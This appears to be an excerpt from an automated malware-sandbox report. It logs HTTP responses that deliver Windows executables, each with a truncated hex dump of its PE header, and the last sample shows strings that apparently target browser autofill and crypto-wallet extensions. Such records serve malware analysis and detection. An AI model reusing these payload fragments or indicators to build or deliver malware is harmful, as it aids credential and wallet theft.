Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:24 GMTContent-Type: application/octet-streamContent-Length: 605696Last-Modified: Thu, 12 Dec 2024 15:01:40 GMTConnection: keep-aliveETag: "675afad4-93e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 04 00 00 00 00 00 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 08 00 b4 00 00 00 00 60 09 00 48 04 00 00 00 10 09 00 74 4c 00 00 00 00 00 00 00 00 00 00 00 70 09 00 90 0b 00 00 80 04 08 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 06 08 00 28 00 00 00 40 03 08 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 07 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3e ec 06 00 00 10 00 00 00 ee 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 ce 01 00 00 00 07 00 00 d0 01 00 00 f2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3b 00 00 00 d0 08 00 00 1c 00 00 00 c2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 74 4c 00 00 00 10 09 00 00 4e 00 00 00 de 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 48 04 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 90 0b 00 00 00 70 09 00 00 0c 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:30 GMTContent-Type: application/octet-streamContent-Length: 308224Last-Modified: Thu, 12 Dec 2024 15:27:42 GMTConnection: keep-aliveETag: "675b00ee-4b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 60 50 59 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 68 00 00 28 00 00 00 00 90 00 00 28 03 00 00 00 80 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb 39 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c8 18 00 00 00 50 00 00 00 1a 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 40 02 00 00 00 80 00 00 00 04 00 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 90 00 00 00 04 00 00 00 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 60 04 00 00 a0 00 00 00 54 04 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:36 GMTContent-Type: application/octet-streamContent-Length: 1985024Last-Modified: Thu, 12 Dec 2024 14:33:08 GMTConnection: keep-aliveETag: "675af424-1e4a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 80 87 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 87 00 00 04 00 00 f5 c2 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5a 10 42 00 6e 00 00 00 00 e0 40 00 68 21 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 b8 86 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 40 00 00 10 00 00 00 54 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 21 01 00 00 e0 40 00 00 94 00 00 00 64 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 42 00 00 02 00 00 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2a 00 00 20 42 00 00 02 00 00 00 fa 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 68 66 74 6e 77 67 6b 00 30 1b 00 00 40 6c 00 00 28 1b 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6e 6c 6e 6b 74 6d 72 00 10 00 00 00 70 87 00 00 04 00 00 00 24 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 87 00 00 22 00 00 00 28 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 23:48:41 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 10 Dec 2024 15:45:48 GMTETag: "5a452c-628ec5ffff268"Accept-Ranges: bytesContent-Length: 5915948Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f 5a 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:45 GMTContent-Type: application/octet-streamContent-Length: 970752Last-Modified: Thu, 12 Dec 2024 15:22:54 GMTConnection: keep-aliveETag: "675affce-ed000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 ff 5a 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 f5 38 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 65 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 65 01 00 00 40 0d 00 00 66 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 12 Dec 2024 15:48:52 GMTContent-Type: application/octet-streamContent-Length: 1807360Last-Modified: Thu, 12 Dec 2024 15:24:14 GMTConnection: keep-aliveETag: "675b001e-1b9400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 60 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 69 00 00 04 00 00 79 8d 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 64 6f 61 6a 6f 67 7a 00 f0 19 00 00 60 4f 00 00 f0 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 66 75 6c 70 73 6c 71 00 10 00 00 00 50 69 00 00 04 00 00 00 6e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 69 00 00 22 00 00 00 72 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 12 Dec 2024 23:48:52 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Tue, 10 Dec 2024 22:39:28 GMTETag: "4b200-628f2276e1a78"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 02 03 00 4b 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 20 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
